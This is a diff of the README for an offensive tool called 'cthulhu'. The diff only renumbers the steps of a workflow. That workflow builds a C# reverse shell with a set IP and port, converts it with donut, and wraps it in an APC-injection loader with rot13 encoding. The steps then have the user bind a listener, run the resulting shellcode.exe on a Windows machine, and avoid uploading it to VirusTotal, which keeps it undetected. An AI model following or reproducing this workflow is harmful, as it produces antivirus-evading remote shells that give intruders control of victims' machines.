foxlox/cthulhu/README.md

 # Example

-Create a new Visual Studio C# Console Project
+1. Create a new Visual Studio C# Console Project

-Add reverse.cs and set IP and PORT
+2. Add reverse.cs and set IP and PORT

-Build it
+3. Build it

-go to Linux box
+4. go to Linux box

-$ donut compiledapp.exe -o ca.bin
+5. $ donut compiledapp.exe -o ca.bin

-$ python3 cthulhu.py -method apc -arch x86 -bin ca.bin -enc rot13
+6. $ python3 cthulhu.py -method apc -arch x86 -bin ca.bin -enc rot13

 [+]shellcode created: /tmp/shellcode.exe

+8. Bind the right port on your linux box and wait.

-Copy shellcode.exe on Windows box and run it.
+9. Copy shellcode.exe on Windows box and run it.
 Don't remember to start your Antivirus.

-Don't upload your shellcode.exe on Virustotal
+10. Don't upload your shellcode.exe on Virustotal

     *fox